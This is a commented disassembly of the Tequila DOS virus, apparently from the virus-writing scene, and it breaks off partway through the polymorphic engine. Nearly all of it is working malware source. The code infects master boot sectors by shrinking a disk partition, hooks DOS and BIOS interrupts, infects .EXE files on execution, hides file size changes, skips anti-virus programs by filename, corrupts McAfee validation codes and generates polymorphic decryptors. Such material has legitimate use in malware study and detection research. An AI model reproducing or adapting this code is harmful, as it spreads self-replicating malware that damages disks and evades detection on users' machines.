END START
; Tequila.2468.A (exact) disasm.
; Multipartite semi-stealth polymorphic MBS & .EXE-infector.
; Bugs marked with '***'.
; T-2000/IR, March 2000.

.MODEL TINY
.STACK 512
.CODE

Virus_Size EQU (End_Body-START)


Virus_Size_512 EQU ((End_Body-START)+511)/512
Virus_Size_1024 EQU ((End_Body-START)+1023)/1024
Virus_Size_Mem EQU ((End_Heap-START)+15)/16

START:

Host_IP DW OFFSET Carrier


Host_CS DW (256/16)
Host_SS DW (256/16)

Infect_Year DW 0 ; Year of MBS infection.


Infect_MD DW 0 ; Month & day of MBS infection.

Tunnel_Success DB 0 ; DOS' INT 13h found boolean.

Word_16 DW 16 ; Used for MUL/DIV operations.


Word_512 DW 512
Word_250 DW 250
Byte_12 DB 12

Message DB 0Dh, 0Ah, 0Dh, 0Ah


DB 'Welcome to T.TEQUILA''s latest production.', 0Dh, 0Ah
DB 'Contact T.TEQUILA/P.o.Box 543/6312 St''hausen/Switzerland.', 0Dh, 0Ah
DB 'Loving thoughts to L.I.N.D.A', 0Dh, 0Ah, 0Dh, 0Ah
DB 'BEER and TEQUILA forever !', 0Dh, 0Ah, 0Dh, 0Ah, '$'

Hint DB 'Execute: mov ax, FE03 / int 21. Key to go on!'

; Tequila's activation routine. It's supposed to activate on the same day
; as the MBS infection took place, 3 or more months later, when it will
; draw a colorful Mandelbrot set consisting of ASCII characters and
; display a message.

Check_Activate:
PUSH BP
MOV BP, SP

SUB SP, (6*2) ; Reserve 12 bytes on the


; stack.
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH ES
PUSH DS

PUSH CS
POP DS

MOV AX, Infect_Year ; Year of MBS infection.


INC AX ; Skip all further checks?
JZ JMP_Exit_Act ; Yep.

DEC AX ; We're in countdown mode?


JNZ Check_Date ; Nope.

DEC Infect_MD ; 3 program exits so far?


JNZ JMP_Exit_Act ; Else bug out.

JMP Init_Video_Seg ; Do the effect.

Check_Date: MOV AH, 2Ah ; Get the current date.


CALL Do_Old_Int21h

MOV SI, CX ; SI = year count.

MOV CX, Infect_MD

CMP CL, DL ; Same day as infection?


JNE Disable_Check

MOV AX, SI ; AX = current year count.

SUB AX, Infect_Year ; Minus the year count of


; MBS infection.

MUL Byte_12 ; Calculate total count of


; months in year count.

ADD AL, DH ; Plus current month.


; AL = amount of months since
; MBS infection took place.

ADD CH, 3 ; Infection date + 3 months.

CMP AL, CH ; 3 months have passed?


JAE Enable_Call ; Then enable the payload.

Disable_Check: MOV Infect_Year, -1 ; Don't check the date


JMP JMP_Exit_Act ; anymore.

Enable_Call: MOV Infect_Year, 0 ; Signal that the payload


; can activate and the 0FE03h
; call can be accepted.

MOV Infect_MD, 3 ; Countdown timer, wait 3


; program exits before
; activation.
JMP_Exit_Act: JMP Exit_Activate

Init_Video_Seg: MOV BX, 0B800h ; VGA video segment.

INT 11h ; Get equipment status.

AND AX, 0000000000110000b ; Mask out video state.

CMP AX, 0000000000110000b ; 80x25 monochrome?


JNE Set_Video_Seg

MOV BX, 0B000h ; Monochrome video segment.

Set_Video_Seg: MOV ES, BX


; I didn't bother commenting the effect as I don't have a clue of what the
; fuck it's doing. Besides, graphical payloads are for lamers anyways....

XOR BX, BX

MOV DI, 0FD8Fh

LOC_9: MOV SI, 0FC18h

LOC_10: MOV [BP-(1*2)], SI


MOV [BP-(2*2)], DI

MOV CX, 30

LOCLOOP_11: MOV AX,[BP-(1*2)]


IMUL AX ; dx:ax = reg * ax

MOV [BP-(4*2)], AX
MOV [BP-(3*2)], DX

MOV AX, [BP-(2*2)]


IMUL AX ; dx:ax = reg * ax

MOV [BP-(6*2)], AX
MOV [BP-(5*2)], DX

ADD AX, [BP-(4*2)]


ADC DX, [BP-(3*2)]

CMP DX, 15
JAE LOC_12

MOV AX, [BP-(1*2)]


IMUL WORD PTR [BP-(2*2)] ; dx:ax = data * ax
IDIV Word_250 ; ax,dxrem=dx:ax/data

ADD AX, DI
MOV [BP-(2*2)], AX

MOV AX, [BP-(4*2)]


MOV DX, [BP-(3*2)]

SUB AX, [BP-(6*2)]


SBB DX, [BP-(5*2)]
IDIV Word_512

ADD AX, SI
MOV [BP-(1*2)], AX

LOOP LOCLOOP_11

LOC_12: INC CX
SHR CL, 1

MOV CH, CL
MOV CL, 0DBh
MOV ES:[BX], CX

INC BX
INC BX

ADD SI, 18
CMP SI, 1B8h
JL LOC_10

ADD DI, 52

CMP DI, 2A3h


JL LOC_9

XOR DI, DI ; Display the hint on screen.


MOV SI, OFFSET Hint
MOV CX, (Check_Activate-Hint)
CLD

Write_Char: MOVSB ; Put a byte in video RAM.


INC DI ; Don't change the attribute.

LOOP Write_Char ; Do the entire string.

XOR AX, AX ; Wait for a keypress.


INT 16h

Exit_Activate: POP DS
POP ES
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX

MOV SP, BP
POP BP

RETN

; This displays Tequila's message.


Display_Message:
PUSH DX
PUSH DS

PUSH CS
POP DS

MOV AH, 09h ; Display string.


MOV DX, OFFSET Message
CALL Do_Old_Int21h

POP DS
POP DX

RETN

; This gets inserted into MBSs.

MBS_Loader:
CLI

XOR BX, BX ; Zero DS.


MOV DS, BX

MOV SS, BX ; Setup a stack.


MOV SP, 7C00h
STI

XOR DI, DI

; Steal 3k of DOS memory to go resident into.

SUB WORD PTR DS:[413h], Virus_Size_1024


INT 12h

MOV CL, 6 ; Calculate segment to go


SHL AX, CL ; resident into.

MOV ES, AX ; Push relocated address.


PUSH ES

MOV AX, OFFSET Relocated_Boot


PUSH AX

; Read the virusbody off disk.

MOV AX, 0200h+Virus_Size_512


MOV CX, DS:[7C00h+(Home_ST-MBS_Loader)]
INC CX
MOV DX, DS:[7C00h+(Home_HD-MBS_Loader)]
INT 13h

RETF ; Jump to the relocated code.

ID_Word DW 0FE02h ; Already-infected-tag.

Home_ST DW 0 ; Sector/track of virusbody.


Home_HD DW 0 ; Head/drive of virusbody.

Relocated_Boot: PUSH CS
POP DS

XOR AX, AX ; Zero ES.


MOV ES, AX

MOV BX, 7C00h

PUSH ES ; ES:BX = 0000:7C00, boot


PUSH BX ; address.

MOV AX, 0201h ; Read the original MBS from


MOV CX, Home_ST ; disk.
MOV DX, Home_HD
INT 13h

PUSH CS
POP ES

; Create a copy of the INT 13h ISR, and the
; body encryptor & appender, as the virus will
; encrypt the runtime code when it infects a file
; so it doesn't have to use a separate buffer.

CLD
MOV SI, OFFSET New_Int13h
MOV DI, OFFSET New_Int13h_Copy
MOV CX, (New_Int1Ch-New_Int13h)
REP MOVSB
MOV SI, OFFSET Append_Body_Encrypted
MOV DI, OFFSET Append_Body_Encrypted_Copy
MOV CX, (Decryptor-Append_Body_Encrypted)
REP MOVSB

CLI

XOR AX, AX ; ES = IVT.


MOV ES, AX

LES BX, ES:[(1Ch*4)] ; Get INT 1Ch (timer).

MOV Old_Int1Ch, BX ; Save INT 1Ch.


MOV Old_Int1Ch+2, ES

MOV ES, AX ; ES = IVT.

LES BX, ES:[(21h*4)] ; Get INT 21h.

MOV Old_Int21h, BX ; Save INT 21h as well.
MOV Old_Int21h+2, ES

MOV ES, AX ; ES = IVT.

; Hook INT 1Ch.

MOV ES:[(1Ch*4)], OFFSET New_Int1Ch


MOV ES:[(1Ch*4)+2], DS

STI

RETF ; Jump to the original MBS.

; This is where the polymorphic decryptor jumps


; to after it's done decrypting the virusbody.

Init_Virus:
CALL Get_IP ; Calculate the virus'
Get_IP: POP SI ; delta offset in this CS.
SUB SI, OFFSET Get_IP

PUSH SI ; Save some needed registers.


PUSH AX
PUSH ES

PUSH CS
POP DS

MOV AX, ES ; AX = current PSP.

; Add the effective segment (PSP) to the segment values.

ADD [SI+(Host_CS-START)], AX
ADD [SI+(Host_SS-START)], AX

DEC AX ; Get the host's MCB in ES.


MOV ES, AX

MOV AX, 0FE02h ; Virus' residency check.


INT 21h
CMP AX, NOT 0FE02h ; Virus is already installed?
JE Run_Host ; Then just bail to the host.

CMP BYTE PTR ES:[0], 'Z' ; Make sure this block is the
JNE Run_Host ; last one in the chain, else
; higher blocks might get
; damaged.

; Make sure the memory block holds enough


; space to put the viruscode in.

CMP WORD PTR ES:[3], Virus_Size_Mem


JBE Run_Host

MOV AX, ES:[12h] ; PSP:[2], holds TOM segment.


SUB AX, Virus_Size_Mem ; Minus the virus' size to
; get the virus segment.

MOV ES, AX ; Virus segment.

XOR DI, DI ; Relocate the viruscode to


MOV CX, Virus_Size ; the newly calculated
CLD ; unused segment.
REP MOVSB

PUSH ES ; DS = virus segment.


POP DS

CALL Infect_MBS ; Infect the 1st MBS.

Run_Host: POP ES ; Restore ES (PSP).


POP AX ; Restore AX (FCB status).

PUSH ES ; DS=ES=PSP.
POP DS

POP SI ; Restore virus delta offset.

; Restore the host's original SS.

MOV SS, CS:[SI+(Host_SS-START)]

; And jump to the host's original entrypoint.

JMP DWORD PTR CS:[SI+(Host_IP-START)]

Infect_MBS:
MOV AH, 2Ah ; Get the current date.
INT 21h

MOV Infect_Year, CX ; Store date of infection.


MOV Infect_MD, DX

MOV AH, 52h ; Get M$-DOS list of lists.


INT 21h ; (undocumented).

MOV AX, ES:[BX-2] ; Get segment of 1st MCB.


MOV First_MCB, AX ; And save it for tunneler.

MOV AX, 3513h ; Get INT 13h.


INT 21h
MOV Old_Int13h, BX ; Save INT 13h.
MOV Old_Int13h+2, ES

MOV AX, 3501h ; Get INT 01h.


INT 21h

MOV SI, BX ; Save INT 01h in DI:SI.


MOV DI, ES

MOV AX, 2501h ; Put in the tunneler.


MOV DX, OFFSET New_Int01h
INT 21h

MOV Tunnel_Success, 0 ; Initialize as 'not found'.

PUSHF ; Set the trapflag (TF).


POP AX
OR AX, 100h
PUSH AX
POPF

MOV AX, 0201h ; Read the MBS of HD 1.


MOV BX, OFFSET Buffer
MOV CX, 1
MOV DX, 80h

PUSH DS
POP ES

PUSHF ; Call INT 13h while tracing.


CALL DWORD PTR Old_Int13h

PUSHF ; Disable the TF incase


POP AX ; INT 13h wasn't found.
AND AX, NOT 100h
PUSH AX
POPF

PUSHF

MOV AX, 2501h ; Restore original INT 01h.


MOV DX, SI
MOV DS, DI
INT 21h

POPF ; Flags after the MBS read.


JNC Check_MBS ; If error, then bail out.

JMP Exit_Inf_MBS

Check_MBS: PUSH ES ; ES = virus segment.


POP DS

; Check if the MBS is already infected.

CMP [BX+(ID_Word-MBS_Loader)], 0FE02h


JNE Find_DOS_Part

JMP Exit_Inf_MBS

; This locates a DOS partition.

Find_DOS_Part: ADD BX, 1BEh ; BX = begin partition table.


MOV CX, 4 ; Maximum of 4 partitions.

Scan_Partition: MOV AL, [BX+4] ; Get the partition's system


; indicator.

CMP AL, 4 ; DOS 16-bit FAT ?


JE Store_Home

CMP AL, 6 ; DOS > 32M ?


JE Store_Home

CMP AL, 1 ; DOS 12-bit FAT ?


JE Store_Home

ADD BX, 16 ; Next partition.

LOOP Scan_Partition ; Loop to the next partition.

JMP Exit_Inf_MBS ; None found.

Store_Home: MOV DL, 80h ; First harddisk.


MOV DH, [BX+5] ; Last head of DOS partition.

MOV Home_HD, DX ; Store virus' home


; drive & head.

MOV AX, [BX+6] ; Last sector & track of


; DOS partition.
MOV CX, AX
MOV SI, Virus_Size_512+1 ; Virus sectors + old MBS.

AND AX, 0000000000111111b ; Strip track count to get


; the last track sector.

CMP AX, SI ; There's enough space on


JBE Exit_Inf_MBS ; this track for the virus?

SUB CX, SI ; Steal needed sectors from


; the partition's last track.
MOV DI, BX
INC CX
MOV Home_ST, CX

MOV AX, 0301h ; Store the MBS on the stolen


MOV BX, OFFSET Buffer ; partition sectors.

PUSHF
CALL DWORD PTR Old_Int13h
JC Exit_Inf_MBS

DEC CX ; Adjust the DOS partition


MOV [DI+6], CX ; to have 6 sectors less.

INC CX

SUB [DI+12], SI ; Adjust the partition sector
SBB WORD PTR [DI+12+2], 0 ; count as well.

; Write the virusbody to the stolen sectors.

MOV AX, 0300h+Virus_Size_512


MOV BX, 0
INC CX

PUSHF ; INT 13h.


CALL DWORD PTR Old_Int13h
JC Exit_Inf_MBS

; Copy the virus MBS loader into the MBS.

MOV SI, OFFSET MBS_Loader


MOV DI, OFFSET Buffer
MOV CX, (Relocated_Boot-MBS_Loader)
CLD
REP MOVSB

MOV AX, 0301h ; Write the infected MBS


MOV BX, OFFSET Buffer ; to disk.
MOV CX, 1
XOR DH, DH

PUSHF ; INT 13h.


CALL DWORD PTR Old_Int13h

Exit_Inf_MBS: RETN

New_Int01h:
PUSH BP ; Setup a stack pointer.
MOV BP, SP

CMP CS:Tunnel_Success, 1 ; Tunnel already finished?


JE Clear_TF ; *** Pointless code, since
; the TF is already cleared.

CMP [BP+(2*2)], 1234h ; We're in the DOS kernel?


First_MCB = WORD PTR $-2
JA Exit_Int01h

PUSH AX
PUSH ES

LES AX, [BP+(1*2)] ; Get instruction's CS:IP.

MOV CS:Old_Int13h, AX ; Save it.


MOV CS:Old_Int13h+2, ES

MOV CS:Tunnel_Success, 1 ; Mark tunnel successful.

POP ES
POP AX

Clear_TF: AND [BP+(3*2)], NOT 100h ; Disable the trapflag.

Exit_Int01h: POP BP

IRET

New_Int13h:
CMP CX, 1 ; Track 0, sector 1 ?
JNE JMP_Old_Int13h

CMP DX, 80h ; Head 0, of the 1st HD ?


JNE JMP_Old_Int13h
CMP AH, 03h ; Is it a sector write?
JA JMP_Old_Int13h

CMP AH, 02h ; Or a sector read?


JB JMP_Old_Int13h

PUSH CX
PUSH DX

DEC AL ; Only the MBS gets read?


JZ Read_Orig_MBS

PUSH AX
PUSH BX

ADD BX, 512 ; Next sector in buffer.


INC CX ; Next sector.

PUSHF ; Process the other sectors


CALL DWORD PTR CS:Old_Int13h ; first, so the MBS action
; can be redirected to the
; clean one.
POP BX
POP AX

Read_Orig_MBS: MOV AL, 1 ; Just the MBS.

MOV CX, CS:Home_ST ; Load address of original


MOV DX, CS:Home_HD ; MBS.

PUSHF ; Read/write the original


CALL DWORD PTR CS:Old_Int13h ; MBS.

POP DX
POP CX

RETF 2 ; Return with flags.

JMP_Old_Int13h: JMP DWORD PTR CS:Old_Int13h

New_Int1Ch:
PUSH AX
PUSH BX
PUSH ES
PUSH DS

XOR AX, AX ; ES = IVT.


MOV ES, AX

PUSH CS
POP DS

LES BX, ES:[(21h*4)] ; Get INT 21h.

MOV AX, ES ; AX = segment of INT 21h.

CMP AX, 800h ; Is it too high?


JA Exit_Int1Ch ; Then assume DOS ain't
; loaded yet.

CMP AX, Old_Int21h+2 ; Has the DOS segment


JNE Save_Int21h ; changed since boot-up?

CMP BX, Old_Int21h ; Has the DOS offset changed


JE Exit_Int1Ch ; since boot-up?

Save_Int21h: MOV Old_Int21h, BX ; Save INT 21h.


MOV Old_Int21h+2, ES

XOR AX, AX ; DS = IVT.


MOV DS, AX

LES BX, DWORD PTR CS:Old_Int1Ch

MOV DS:[(1Ch*4)], BX ; Restore original INT 1Ch.


MOV DS:[(1Ch*4)+2], ES

LES BX, DS:[(13h*4)] ; Get INT 13h.

MOV CS:Old_Int13h, BX ; Save INT 13h.


MOV CS:Old_Int13h+2, ES

; Hook INT 13h.

MOV DS:[(13h*4)], OFFSET New_Int13h_Copy


MOV DS:[(13h*4)+2], CS

; Hook INT 21h.

MOV DS:[(21h*4)], OFFSET New_Int21h


MOV DS:[(21h*4)+2], CS

Exit_Int1Ch: POP DS
POP ES
POP BX
POP AX

IRET

New_Int21h:
CMP AH, 11h ; Findfirst (FCB) ?
JB Check_Dir_St

CMP AH, 12h ; Findnext (FCB) ?


JA Check_Dir_St

CALL FCB_Stealth ; Carry-out the FCB stealth.

RETF 2 ; Return with flags.

Check_Dir_St: CMP AH, 4Eh ; Findfirst (dir) ?


JB Check_TSR_Test

CMP AH, 4Fh ; Findnext (dir) ?


JA Check_TSR_Test

CALL Dir_Stealth ; Carry-out the dir stealth.

RETF 2 ; Return with flags.

Check_TSR_Test: CMP AX, 0FE02h ; Virus' residency check?


JNE Check_Message
NOT AX ; Return TSR mark.

IRET ; Return to the caller.

Check_Message: CMP AX, 0FE03h ; Call to display message?


JNE Check_Exec

CMP CS:Infect_Year, 0 ; The date was correct?


JNZ JMP_Old_Int21h ; Else just ignore the call.

CALL Display_Message

IRET

Check_Exec: CMP AX, 4B00h ; Program execute?


JE Init_Stack

CMP AH, 4Ch ; Program terminate?


JNE JMP_Old_Int21h

Init_Stack: MOV CS:Old_SP, SP ; Save the current stack.


MOV CS:Old_SS, SS

CLI ; Setup own stack.


PUSH CS
POP SS
MOV SP, OFFSET Validate_Header+128
STI

CMP AH, 4Ch ; Was it program terminate?


JNE Do_Infect_File

CALL Check_Activate

JMP Restore_Stack

Do_Infect_File: CALL Infect_File

Restore_Stack: CLI ; Restore the original stack.


MOV SS, CS:Old_SS
MOV SP, CS:Old_SP
STI

JMP $+2 ; *** Pointless instruction.

JMP_Old_Int21h: INC CS:Int_Count ; Update random counter.

JMP DWORD PTR CS:Old_Int21h

New_Int24h:
MOV AL, 03h ; Fail operation.
IRET

FCB_Stealth:
PUSH BX
PUSH ES

PUSH AX

MOV AH, 2Fh ; Get current DTA.


CALL Do_Old_Int21h
POP AX

PUSHF ; Execute the call.


CALL DWORD PTR CS:Old_Int21h

PUSHF
PUSH AX

CMP AL, -1 ; Error?


JE Exit_FCB_St ; Then get out.

CMP ES:[BX.FCB_Drive], -1 ; Is it an extended FCB ?


JNE Get_FCB_Time

ADD BX, 7 ; Then skip extended stuff.

Get_FCB_Time: MOV AL, BYTE PTR ES:[BX.FCB_Time]

AND AL, 00011111b ; Mask-out seconds value.

CMP AL, (62/2) ; File is infected?


JNE Exit_FCB_St

; Restore the original filesize.

SUB ES:[BX.FCB_Size], Virus_Size


SBB ES:[BX.FCB_Size+2], 0

Exit_FCB_St: POP AX
POPF

POP ES
POP BX

RETN

Dir_Stealth:
PUSH BX
PUSH ES

PUSH AX

MOV AH, 2Fh ; Get current DTA.


CALL Do_Old_Int21h

POP AX

PUSHF ; Execute the call.


CALL DWORD PTR CS:Old_Int21h

PUSHF
PUSH AX
JC Exit_Dir_St ; Get out if error.

MOV AL, BYTE PTR ES:[BX.Dir_Time]

AND AL, 00011111b ; Mask-out seconds value.

CMP AL, (62/2) ; File is infected?


JNE Exit_Dir_St
; Restore original filesize.

SUB ES:[BX.Dir_Size], Virus_Size


SBB ES:[BX.Dir_Size+2], 0

Exit_Dir_St: POP AX
POPF

POP ES
POP BX

RETN

Write_File:
MOV AH, 40h ; Write to file.
JMP Do_Read_Write

Read_File:
MOV AH, 3Fh ; Read from file.
Do_Read_Write: CALL Load_BX_Int21h
JC Exit_Re_Wr ; If error then exit with CF.

SUB AX, CX ; Sets CF if not all bytes
; were read.
Exit_Re_Wr: RETN

Seek_EOF:
XOR CX, CX ; Seeks to end of file.
XOR DX, DX
Seek_EOF_Rel: MOV AX, 4202h ; Seeks EOF relative.
JMP Load_BX_Int21h

Seek_BOF:
XOR CX, CX ; Seeks to begin of file.
XOR DX, DX
MOV AX, 4200h
Load_BX_Int21h: MOV BX, CS:File_Handle ; Load the filehandle.

Do_Old_Int21h: CLI ; Do the DOS call.


PUSHF
CALL DWORD PTR CS:Old_Int21h

RETN

Infect_File:
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH ES
PUSH DS

CALL Check_File_Name ; Filename can't contain 'SC'


JNC Init_Infect ; or a 'V'.

JMP Exit_Infect
Init_Infect: PUSH DX
PUSH DS

PUSH CS
POP DS

MOV AX, 3524h ; Get INT 24h.


CALL Do_Old_Int21h

MOV Old_Int24h, BX ; Save it.


MOV Old_Int24h+2, ES

MOV AX, 2524h ; Install own INT 24h.


MOV DX, OFFSET New_Int24h
CALL Do_Old_Int21h

POP DS ; File path.


POP DX

MOV AX, 4300h ; Get file's attributes.


CALL Do_Old_Int21h

MOV CS:Old_Attr, CX ; Save attributes.

JNC Blank_Attr

DB 0E9h, 7Eh, 0

; * JMP Restore_Int24h *

Blank_Attr: MOV AX, 4301h ; Blank file attributes.


XOR CX, CX
CALL Do_Old_Int21h
JC Restore_Int24h

MOV AX, 3D02h ; Open the file read/write.


CALL Do_Old_Int21h
JC Restore_Attr

PUSH DX
PUSH DS

PUSH CS
POP DS

MOV File_Handle, AX ; Save the filehandle.

MOV AX, 5700h ; Get file's date & time.


CALL Load_BX_Int21h
JC Restore_Date

MOV Old_File_Date, DX ; Save them.


MOV Old_File_Time, CX

CALL Seek_BOF ; Seek to the start of the


; file. *** file pointer is
; already at BOF.

MOV DX, OFFSET Header ; Read the file's header.


MOV CX, 28 ; *** Reading in more than
CALL Read_File ; needed.
JC Restore_Date
PUSH DS
POP ES

MOV DI, OFFSET Check_Activate


MOV CX, 32

CMP Header.EXE_ID, 'ZM' ; It's an .EXE-file?


JNE Restore_Date ; If not, abort infect.

MOV AX, Header.Checksum ; See if the checksum matches


CLD ; a semi-random word in the
REPNE SCASW ; viruscode.
JNE Check_Validate

OR Old_File_Time, (62/2) ; *** Infected files already


; have 62 seconds.
JMP Restore_Date

Check_Validate: CALL Remove_Validate ; Remove McAfee validation


JC Restore_Date ; shit.

CALL Add_Virus ; Add the virus to the file.

Restore_Date: MOV AX, 5701h ; Restore file's date & time.


MOV DX, Old_File_Date
MOV CX, Old_File_Time
CALL Load_BX_Int21h

MOV AH, 3Eh ; Close the file.


CALL Load_BX_Int21h

POP DS ; File path.


POP DX

Restore_Attr: MOV AX, 4301h ; Restore file's original


MOV CX, CS:Old_Attr ; attributes.
CALL Do_Old_Int21h

Restore_Int24h: MOV AX, 2524h ; Restore original INT 24h.


LDS DX, DWORD PTR CS:Old_Int24h
CALL Do_Old_Int21h

Exit_Infect: POP DS
POP ES
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX

RETN

; Returns CF when the filename holds 'SC' or a 'V'; this includes most
; anti-virus programs: SCAN, TBSCAN, VIRSCAN, CPAV, NAV, IBMAV, etc.
Check_File_Name:
PUSH DS
POP ES

MOV DI, DX ; Find the end of the string.


MOV CX, -1
XOR AL, AL
CLD
REPNE SCASB

NOT CX ; CX = length of entire path.

MOV DI, DX

MOV AX, 'CS' ; 'SC'.

MOV SI, CX

Find_SCan: SCASW ; Found 'SC' ?


JE Bad_File_Name ; Then bail.

DEC DI ; We're doing bytes.

LOOP Find_SCan

MOV CX, SI ; Search for a 'V'.


MOV DI, DX
MOV AL, 'V'
REPNE SCASB
JE Bad_File_Name

; *** It would have been better if only the filename


; was searched instead of the entire path.

Good_File_Name: CLC ; Filename is OK.

RETN

Bad_File_Name: STC ; Filename ain't OK!

RETN

; Removes a possible McAfee validation code from the file.


Remove_Validate:
MOV CX, -1 ; Seek to the last 10 bytes.
MOV DX, -10
CALL Seek_EOF_Rel

MOV DX, OFFSET Validate_Header ; Read 8 from there.


MOV CX, 8
CALL Read_File
JC Exit_Remove_Va

CMP Validate_Header, 0FDF0h ; Check for the signature.


JNE Not_Protected

CMP Validate_Header+2, 0AAC5h


JNE Not_Protected

MOV CX, -1 ; Seek to the last 9 bytes.


MOV DX, -9
CALL Seek_EOF_Rel

; Trash signature.

MOV DX, OFFSET Validate_Header+6


MOV CX, 4
CALL Write_File
Exit_Remove_Va: RETN

Not_Protected: CLC

RETN

Add_Virus:
CALL Seek_EOF

MOV SI, AX ; DI:SI = old filesize.


MOV DI, DX

MOV BX, OFFSET Header

MOV AX, [BX.File_512_Pages] ; Calculate 512-byte pages


MUL Word_512 ; of the file.

SUB AX, SI ; Physical size exceeds image


SBB DX, DI ; size? Then it's usually an
JNC Calc_Hdr_Size ; overlay, so bug out.

JMP Exit_Add_Virus

Calc_Hdr_Size: MOV AX, [BX.Header_Size] ; Calculate headersize.


MUL Word_16

SUB SI, AX ; DI:SI = imagesize.


SBB DI, DX

MOV AX, [BX.Program_SS] ; Save file's original SS.


MOV Host_SS, AX
ADD Host_SS, (256/16) ; Add PSP size.

MUL Word_16 ; DX:AX = SS in bytes.

ADD AX, [BX.Program_SP] ; Plus SP value.


; *** Missing a ADC DX, 0.

SUB AX, SI ; Stack points inside the


SBB DX, DI ; program image?
JC Save_CS

SUB AX, 128 ; Original program must have
SBB DX, 0 ; at least 128 bytes of stack.
JC Exit_Add_Virus ; Else get out.

; Adjust the stack so the viruscode


; doesn't get overwritten.

ADD [BX.Program_SS], (Virus_Size+15)/16

Save_CS: MOV AX, [BX.Program_CS] ; Old CS.


ADD AX, (256/16) ; Add size of PSP.

MOV Host_CS, AX ; Save CS.

MOV AX, [BX.Program_IP] ; Save IP.


MOV Host_IP, AX

CALL Seek_EOF
ADD AX, Virus_Size ; Calculate size after
ADC DX, 0 ; infection.

DIV Word_512 ; Calculate imagesize.

INC AX ; Round upwards.

; Set new imagesize.

MOV Header.File_512_Pages, AX
MOV Header.Image_Mod_512, DX

MOV DX, DI ; DI:SI = old imagesize.


MOV AX, SI
DIV Word_16 ; Calculate new CS:IP.

MOV Header.Program_CS, AX ; Set new CS.

MOV BX, DX ; BX = new IP.

ADD DX, OFFSET Decryptor ; Set new IP.


MOV Header.Program_IP, DX

CALL Poly_Engine ; Add a polymorphic virus


JC Exit_Add_Virus ; copy to the host.

OR Old_File_Time, (62/2) ; Mark the file as infected


; by setting the second value
; to an invalid setting.

MOV BX, Int_Count ; Random counter.


AND BX, 00011111b ; 0 - 31.
SHL BX, 1 ; MUL 2 (for word index).

; Put a semi-random word from the viruscode in the


; header's checksum field to mark the infection.

MOV AX, [(Check_Activate-START)+BX]


MOV Header.Checksum, AX

CALL Seek_BOF

MOV CX, 28 ; Write the updated header


MOV DX, OFFSET Header ; to the target.
CALL Write_File

Exit_Add_Virus: RETN

; The decryptors being generated are quite simple; they are effective
; enough against pure signature scanners, though they can be found with a
; simple algorithmic approach. A peculiarity is that the decryptors use
; themselves as a key, which drastically complicates debugging.

Poly_Engine:
PUSH BP

XOR AH, AH ; Get BIOS tick count.


INT 1Ah

MOV AX, DX
MOV BP, DX ; BP is used as a pointer to
; random data.
PUSH DS
POP ES

MOV DI, OFFSET Decryptor ; Fill the decryptor area


MOV SI, DI ; with a random word.
MOV CX, (64/2)
CLD
REP STOSW

XOR DX, DX ; Zero ES.


MOV ES, DX

CALL Make_Load_DS ; Construct the decryptor.


CALL Make_Load_Ptr
CALL Make_Decr_Loop

MOV BYTE PTR [SI], 0E9h ; JMP 16-bit displacement.

MOV DI, OFFSET Init_Virus ; Calculate displacement


SUB DI, SI ; to Init_Virus.
SUB DI, 3

INC SI

MOV [SI], DI ; Set displacement.

MOV AX, OFFSET Append_Body_Encrypted_Copy


CALL AX

POP BP

RETN

Make_Load_DS:
DEC BP ; Adjust random pointer.
; *** Not needed as this is
; the first reference to it.

TEST BYTE PTR ES:[BP], 00000010b ; Test a random bit.


JNZ Make_Load_DS_2

Make_Load_DS_1: MOV BYTE PTR [SI], 0Eh ; PUSH CS


INC SI

CALL Add_Junk ; Add a garbage instruction.

MOV BYTE PTR [SI], 1Fh ; POP DS


INC SI

CALL Add_Junk

RETN

Make_Load_DS_2: MOV [SI], 0CB8Ch ; MOV BX, CS


INC SI
INC SI

CALL Add_Junk

MOV [SI], 0DB8Eh ; MOV DS, BX


INC SI
INC SI
CALL Add_Junk

RETN

Make_Load_Ptr:
AND CH, 11111110b ; BX is start code.
; *** CX is already zero.
DEC BP

TEST BYTE PTR ES:[BP], 00000010b


JZ Make_MOV_BX

OR CH, 00000001b ; SI is start code.

Make_MOV_SI: MOV BYTE PTR [SI], 0BEh ; MOV SI, xxxx


INC SI

MOV [SI], BX ; Start virus in CS or


INC SI ; start decryptor in CS.
INC SI

CALL Add_Junk

ADD BX, OFFSET Decryptor

TEST CH, 00000001b ; BX is start code?


JZ Make_Counter

Make_MOV_BX: MOV BYTE PTR [SI], 0BBh ; MOV BX, xxxx


INC SI

MOV [SI], BX ; Start virus in CS or


INC SI ; start decryptor in CS.
INC SI

CALL Add_Junk

ADD BX, OFFSET Decryptor

TEST CH, 00000001b ; BX is start code?


JZ Make_MOV_SI ; Then use SI as start
; decryptor.

Make_Counter: SUB BX, OFFSET Decryptor ; Restore BX to virus offset.

CALL Add_Junk

; CX is always the counter register.

MOV BYTE PTR [SI], 0B9h ; MOV CX, xxxx


INC SI

MOV AX, OFFSET Decryptor

MOV [SI], AX ; Size of encrypted code.


INC SI
INC SI

CALL Add_Junk
CALL Add_Junk
RETN

Make_Decr_Loop:
MOV AH, 14h ; DL, [SI]
MOV DH, 17h ; DL, [BX]

TEST CH, 00000001b ; BX is start of code?


JZ Make_Load_Byte ; Yeah.

XCHG AH, DH ; Else SI is.

Make_Load_Byte: MOV DI, SI ; Save start decrypt in DI.

MOV AL, 8Ah ; MOV reg8

MOV [SI], AX ; MOV DL, [SI]/[BX]


INC SI
INC SI

CALL Add_Junk

XOR DL, DL ; ADD BYTE PTR

; Initialize the encryptor.

MOV BYTE PTR DS:[Append_Body_Encrypted_Copy+(Encryptor-Append_Body_Encrypted)], 28h ; SUB BYTE PTR

DEC BP

TEST BYTE PTR ES:[BP], 00000010b


JZ Store_Decrypt

MOV DL, 30h ; XOR BYTE PTR

; Initialize the encryptor.

MOV BYTE PTR DS:[Append_Body_Encrypted_Copy+(Encryptor-Append_Body_Encrypted)], DL

Store_Decrypt: MOV [SI], DX ; Store decrypt instruction.


INC SI
INC SI

MOV [SI], 4346h ; INC SI / INC BX


INC SI
INC SI

CALL Add_Junk

MOV AX, 0FE81h ; CMP SI, xxxx


MOV CL, 0BEh ; MOV SI, xxxx

TEST CH, 00000001b ; BX is start of code?


JZ Make_CMP_End ; Yip-yip.

MOV AH, 0FBh ; CMP BX, xxxx


MOV CL, 0BBh ; MOV BX, xxxx

Make_CMP_End: MOV [SI], AX ; Make CMP end_decryptor.


INC SI
INC SI
PUSH BX
